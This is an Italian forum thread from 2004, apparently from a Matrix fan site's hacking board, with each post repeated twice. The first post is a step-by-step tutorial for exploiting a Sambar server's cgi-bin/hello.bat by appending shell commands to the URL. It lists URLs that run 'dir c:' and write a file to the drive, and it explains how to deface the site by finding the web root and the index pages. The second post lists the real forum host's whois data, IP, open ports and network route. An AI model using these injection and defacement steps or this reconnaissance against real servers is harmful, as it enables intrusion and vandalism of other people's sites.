WhatIsTheMatrix.IT – Il Sito Italiano su Matrix
WhatIsTheMatrix.IT – Il Sito Italiano su Matrix
WhatIsTheMatrix.IT – Il Sito Italiano su MatrixHome // Forum
Hacking
Cita da darknet su 2 Maggio 2004, 16:49Possibile modalità di attacco se il sito è sotto windows:
ATTENZIONE: POST DA RITENERSI A SOLO SCOPO INFORMATIVO
[Sambar Web/FTP Server]
WEB che FTP che contiene un'Api programmabile fino ai minimi dettagli, col suo linguaggio di scripting è possibile realizzare pagine dinamiche html. Per maggiori informazioni: www.sambar.com.
Alcuni siti microsoft hanno il file hello.bat nella cgi-bin col seguente script
[color=#11ff00:1ed8342849]
@echo off
echo Hello world
[/color:1ed8342849]Se entriamo in un sito qualsiasi che possiete il file www.sito.com/cgi-bin/hello.bat
se c'è allore comparirà una pagina con hello world se no compare il classico errore 404.
Ora, io posso fare di tutto da dos.
Per vedere il drive C:
http://www.sito.com/cgi-bin/hello.bat'&dir+c:
dos script
Ora cosa faccio'
1) Conservo l'accesso al systema
2) Creo un file di testo e spieghiamo come sono entrato
3) Defaccio il sito|
|
|
va) Scelta non molto logica, non ci resta una shell ma solo l'accesso a qualche dato di poco conto visto che i server afflitti da questo bug sono pochi.
b) Scelta normale, per i newbie
c) Scelta che io preferisco accoppiare al file di testo, per me il defaced è la maniera più bruta di far capire al SYS ADMIN che deve studiare...Come creare un file di testo
www.sito.com/cgi-bin/hello.bat'&echo+Dark+Net+ti+ha+bucato+il+Server>c:dirhacked.txt
Oppure come volete voi basta che al posto degli spazi mettete "+" una volta dato invio verrà creato un file del nome che avete dato contenente ciò che avete scritto. Adesso credo che non sia difficile capire come si fa il defaced 🙂 però dovete trovare la giàsta WEB ROOT in genere c:InetPubwwwroot ma molto spesso cambia, provate altri drive come D E F G H ecc la pagina iniziale potrebbe avere questi nomi:
index.htm
index.html
index.asp
default.htm
default.html
default.asp
home.htm[Patch: basta eliminare il file hello.bat da /cgi-bin/
Possibile modalità di attacco se il sito è sotto windows:
ATTENZIONE: POST DA RITENERSI A SOLO SCOPO INFORMATIVO
[Sambar Web/FTP Server]
WEB che FTP che contiene un'Api programmabile fino ai minimi dettagli, col suo linguaggio di scripting è possibile realizzare pagine dinamiche html. Per maggiori informazioni: http://www.sambar.com.
Alcuni siti microsoft hanno il file hello.bat nella cgi-bin col seguente script
[color=#11ff00:1ed8342849]
@echo off
echo Hello world
[/color:1ed8342849]
Se entriamo in un sito qualsiasi che possiete il file http://www.sito.com/cgi-bin/hello.bat
se c'è allore comparirà una pagina con hello world se no compare il classico errore 404.
Ora, io posso fare di tutto da dos.
Per vedere il drive C:
http://www.sito.com/cgi-bin/hello.bat'&dir+c:
dos script
Ora cosa faccio'
1) Conservo l'accesso al systema
2) Creo un file di testo e spieghiamo come sono entrato
3) Defaccio il sito
|
|
|
v
a) Scelta non molto logica, non ci resta una shell ma solo l'accesso a qualche dato di poco conto visto che i server afflitti da questo bug sono pochi.
b) Scelta normale, per i newbie
c) Scelta che io preferisco accoppiare al file di testo, per me il defaced è la maniera più bruta di far capire al SYS ADMIN che deve studiare...
Come creare un file di testo
http://www.sito.com/cgi-bin/hello.bat'&echo+Dark+Net+ti+ha+bucato+il+Server>c:dirhacked.txt
Oppure come volete voi basta che al posto degli spazi mettete "+" una volta dato invio verrà creato un file del nome che avete dato contenente ciò che avete scritto. Adesso credo che non sia difficile capire come si fa il defaced 🙂 però dovete trovare la giàsta WEB ROOT in genere c:InetPubwwwroot ma molto spesso cambia, provate altri drive come D E F G H ecc la pagina iniziale potrebbe avere questi nomi:
index.htm
index.html
index.asp
default.htm
default.html
default.asp
home.htm
[Patch: basta eliminare il file hello.bat da /cgi-bin/
Cita da darknet su 11 Maggio 2004, 18:17caro morole-playerheus:
[code:1:8973ccc815]
domain: whatisthematrix.it
x400-domain: c=it; admd=0; prmd=whatisthematrix;
org: censurato per privacy
descr: censurato per privacy
admin-c: EC1810-ITNIC
tech-c: SC279-ITNIC
postmaster: SC279-ITNIC
zone-c: SC279-ITNIC
nserver: 62.149.128.2 dns.technorail.com
nserver: 62.149.132.2 dns2.technorail.com
dom-net: 62.149.0.0
mnt-by: TECHNORAIL-MNT
created: 20030630
expire: 20040630
changed: webmaster@technet.it 20030630
source: IT-NIC[/code:1:8973ccc815]Anche gli altri dati personali censurati (comunque è una stupidata averli, sempre credendo che sono veri)
una volta avuti i dati il sito viene pingato e controllato se attivo.[code:1:8973ccc815]
nome: webx7.aruba.it
IP: 62.149.140.17
Server: Ad Arezzo (S.Arelli 8)[/code:1:8973ccc815]
Vengono scannerizzate le porte, ho trovato la 25 aperta (quella del servizio SMTP)6667 che permette attacchi proxy (cosa ke il nostro lamer nn ha usato se hai il suo IP :ok: )come quello sopra.
Se pingato il tuo server passa per uno di venezia e di milano: Brescia-->Milano-->Venezia-->Arezzo seguendo il percorso del mio PC. Spero ke il server abbia un buon firewall
caro morole-playerheus:
[code:1:8973ccc815]
domain: whatisthematrix.it
x400-domain: c=it; admd=0; prmd=whatisthematrix;
org: censurato per privacy
descr: censurato per privacy
admin-c: EC1810-ITNIC
tech-c: SC279-ITNIC
postmaster: SC279-ITNIC
zone-c: SC279-ITNIC
nserver: 62.149.128.2 dns.technorail.com
nserver: 62.149.132.2 dns2.technorail.com
dom-net: 62.149.0.0
mnt-by: TECHNORAIL-MNT
created: 20030630
expire: 20040630
changed: webmaster@technet.it 20030630
source: IT-NIC[/code:1:8973ccc815]
Anche gli altri dati personali censurati (comunque è una stupidata averli, sempre credendo che sono veri)
una volta avuti i dati il sito viene pingato e controllato se attivo.[code:1:8973ccc815]
nome: webx7.aruba.it
IP: 62.149.140.17
Server: Ad Arezzo (S.Arelli 8)[/code:1:8973ccc815]
Vengono scannerizzate le porte, ho trovato la 25 aperta (quella del servizio SMTP)
6667 che permette attacchi proxy (cosa ke il nostro lamer nn ha usato se hai il suo IP :ok: )come quello sopra.
Se pingato il tuo server passa per uno di venezia e di milano: Brescia-->Milano-->Venezia-->Arezzo seguendo il percorso del mio PC. Spero ke il server abbia un buon firewall